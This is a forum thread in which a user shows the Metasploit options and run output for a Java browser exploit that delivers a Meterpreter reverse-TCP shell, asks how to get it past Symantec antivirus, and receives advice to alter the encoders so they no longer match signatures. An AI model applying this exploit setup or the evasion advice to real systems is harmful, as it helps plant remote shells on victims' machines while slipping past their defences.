hello all,
I have a question about evading AV with a Java payload. Here is my situation:
I am running BT 5. uname is -
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
I have updated BT with msfupdate. I am using 'exploit/multi/browser/java_atomicreferencearray' with payload=java/meterpreter/reverse_tcp. I don't have any problems running this exploit, but when the client connects, the payload is picked up by Symantec antivirus as 'Trojan.Maljava!gen22'.
Here are the exploit options:
msf exploit(java_atomicreferencearray) > show options

Module options (exploit/multi/browser/java_atomicreferencearray):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     javasploit       no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address
   LPORT  4444             yes       The listen port
Here is the output when the exploit is run:
msf exploit(java_atomicreferencearray) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.1:4444
[*] Using URL: http://0.0.0.0:8080/javasploit3
[*] Local IP: http://192.168.1.1:8080/javasploit
msf exploit(java_atomicreferencearray) >
[*] Server started.
[*] 192.168.1.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.1 java_atomicreferencearray - Generated jar to drop (5287 bytes).
[*] 192.168.1.1 java_atomicreferencearray - Sending jar
[*] 192.168.1.1 java_atomicreferencearray - Sending jar
[*] 192.168.1.1 java_atomicreferencearray - Sending jar
I have tried using some of the 'evasion' options within the java exploit but have not had any success. My question is - is there a way to encode the payload with msfencode to successfully bypass AV detection? Let me know if you need more info. thanks in advance!
wow... really... no one has ever encountered this issue before?! i find that hard to believe...
I think it's more the fact that the AV companies are wise to the encoders used in Metasploit, and have signatures for them. If you have a good handle on Ruby, you might try taking one of the existing encoders, and modifying it (or even just inserting some random comments). This might cause enough of a change that Symantec wouldn't catch it (as it didn't match the signature).
If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...
sry drunk post...deleting
btw I believe it's the exploit itself that gets detected, not the payload
Last edited by jnpa123; 06-03-2012 at 01:01 PM.